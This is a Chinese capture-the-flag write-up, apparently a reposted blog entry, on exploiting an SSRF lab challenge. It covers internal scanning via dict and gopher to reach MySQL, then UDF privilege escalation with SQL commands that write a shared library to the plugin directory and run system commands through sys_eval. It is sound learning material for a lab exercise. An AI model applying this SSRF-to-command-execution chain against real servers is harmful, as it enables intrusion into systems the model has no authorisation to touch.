标签:一次 temp SSRF 练习 so usr mysql data
记一次SSRF练习
老表发我一个SSRF的CTF题,感觉还不错,还能练习下SSRF挖掘技巧,权作学习记录。
审题
环境搭建:
git clone https://github.com/sqlsec/ByteCTF2021-Final-SEO.git
cd ByteCTF2021-Final-SEO/Dockerfile
docker-compose up -d
docker搭建好基本上就是一个seo站长工具界面,撸了一遍接口发现如下接口存在漏洞。
做题
到这基本上就确定SSRF点了,不过这个是我测试方法,一般情况下还要测试下外网域名是否能够访问。
从info.php确定主机内网IP:172.73.23.21,之后就可以进行内网扫描。这个站点还有一个文件下载,能够造成任意文件读取,很有必要的,查看内网的一些信息(proc/net/arp)。
这个还是比较好的一个点,如果有该主机的话就会有mac地址信息。之后用dict进行端口扫描,发现3306端口。
查看info.php可知使用了gopher协议,直接使用工具生成查询语句测试,注意二次URL编码。
后续进行UDF提权,几个命令如下:
#查看主机版本及架构
show variables like '%compile%';
#查看 plugin 目录(/usr/lib/mysql/plugin/)
show variables like 'plugin%';
SELECT 0x7f454c460201010000000.......00000 INTO DUMPFILE '/usr/lib/mysql/udf.so';
#创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
select sys_eval('cat /flag');
交卷
经验总结
1.UDF提权过程中,系统环境可能不同,数据库版本可能不同,需要注意。
2.dll,so文件获取可以在kali的路径/usr/share/metasploit-framework/data/exploits/mysql/下获取。
3.gopherus在使用过程中要注意,不同的系统窗口复制粘贴可能大小限制,数据过长可以直接修改gopherus,避免row_input传参。
4.插入数据过程中有限制的话可以使用如下语句拼接:
create table temp(data longblob);
insert into temp(data) values (0x4d5a9000......);
update temp set data = concat(data,0x33c2e......);
select data from temp into dumpfile '/usr/lib/mysql/plugin/udf.so';
5.udf提权只能创建so库里有的函数,不能随意命名,可以使用objdump -tT lib_mysqludf_sys_64.so查看。
标签:一次,temp,SSRF,练习,so,usr,mysql,data 来源: https://blog.csdn.net/qq_38963246/article/details/122154717
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。